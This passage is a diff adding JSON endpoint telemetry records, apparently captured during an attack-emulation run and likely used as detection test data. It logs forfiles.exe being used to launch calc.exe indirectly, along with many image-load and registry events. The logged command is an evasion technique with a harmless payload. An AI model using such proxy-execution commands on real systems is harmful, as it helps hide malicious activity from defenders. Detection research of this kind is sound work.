"{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574020810000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "command_line": "forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4500, + "ppid": 5004, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "subtype": "create", + "timestamp": 131883574020900000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}", + "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "forfiles.exe", + "image_path": "C:\\Windows\\System32\\forfiles.exe", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574020990016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\calc.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "forfiles.exe", + "parent_process_path": "C:\\Windows\\System32\\forfiles.exe", + "pid": 2616, + "ppid": 4500, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "subtype": "create", + "timestamp": 131883574021320000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}", + "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "calc.exe", + "image_path": "C:\\Windows\\System32\\calc.exe", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021260000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021260000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021439984, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021439984, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021439984, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021439984, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021520000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021520000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021520000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021520000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021700000, + "unique_pid": 